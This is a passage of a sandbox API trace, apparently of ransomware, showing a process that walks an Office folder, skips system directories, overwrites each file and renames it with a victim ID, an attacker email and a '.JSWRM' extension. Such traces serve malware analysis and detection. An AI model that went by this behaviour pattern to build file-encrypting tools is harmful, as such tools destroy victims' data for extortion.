hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0102.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0102.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0102.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0102.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.166] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0102.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0102.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f1b0 | out: hHeap=0x1e0000) returned 1 [0102.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.167] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1159842, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1159842, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1218203, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf0cb4, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.visiomui.msi.16.en-us.xml", cAlternateFileName="C2A712~1.XML")) returned 1 [0102.167] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2=".") returned 1 [0102.167] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="..") returned 1 [0102.167] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="...") returned 1 [0102.167] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="windows") returned -1 [0102.167] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0102.167] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0102.167] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0102.167] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0102.167] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0102.167] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0102.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0102.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.visiomui.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0102.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.visiomui.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.visiomui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 37 [0102.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0102.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0102.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.visiomui.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0102.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.visiomui.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.visiomui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 37 [0102.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0102.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0102.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0102.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0102.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.visiomui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.visiomui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.175] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=986292) returned 1 [0102.175] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0102.176] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0102.188] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.188] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0102.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.189] CloseHandle (hObject=0x45c) returned 1 [0102.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0102.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0102.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0102.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0102.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0102.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0102.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.189] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.visiomui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.visiomui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.visiomui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.visiomui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0102.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0102.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0102.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.190] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2c30669, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2c30669, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2dd401b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1536e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", cAlternateFileName="C29B2F~1.XML")) returned 1 [0102.190] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0102.190] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0102.191] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0102.191] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0102.191] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0102.191] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0102.191] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0102.191] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0102.191] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0102.191] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0102.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0102.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0102.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", cchWideChar=46, lpMultiByteStr=0x22d0a0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 46 [0102.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0102.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0102.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0102.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 46 [0102.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0102.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0102.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0102.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0102.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.word.word.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.192] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=86894) returned 1 [0102.192] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15360) returned 0x24c1d0 [0102.192] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x15360, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x15360, lpOverlapped=0x0) returned 1 [0102.199] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.200] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x15360, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x15360, lpOverlapped=0x0) returned 1 [0102.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.200] CloseHandle (hObject=0x45c) returned 1 [0102.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0102.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0102.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0102.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0102.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0102.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0102.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.201] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.word.word.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.word.word.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0102.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0102.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0102.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.202] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd39e5e8b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd39e5e8b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd3a7e818, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x130fe, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.wordmui.msi.16.en-us.xml", cAlternateFileName="C2EB7A~1.XML")) returned 1 [0102.202] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2=".") returned 1 [0102.202] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="..") returned 1 [0102.202] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="...") returned 1 [0102.202] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="windows") returned -1 [0102.202] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0102.202] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0102.202] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0102.202] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0102.202] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0102.202] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0102.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0102.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.wordmui.msi.16.en-us.xml", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.wordmui.msi.16.en-us.xml", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.wordmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 36 [0102.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0102.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0102.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.wordmui.msi.16.en-us.xml", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.wordmui.msi.16.en-us.xml", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.wordmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 36 [0102.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0102.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0102.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0102.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0102.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.wordmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.203] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=78078) returned 1 [0102.203] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130f0) returned 0x24c1d0 [0102.203] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x130f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x130f0, lpOverlapped=0x0) returned 1 [0102.211] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.211] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x130f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x130f0, lpOverlapped=0x0) returned 1 [0102.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.211] CloseHandle (hObject=0x45c) returned 1 [0102.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0102.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 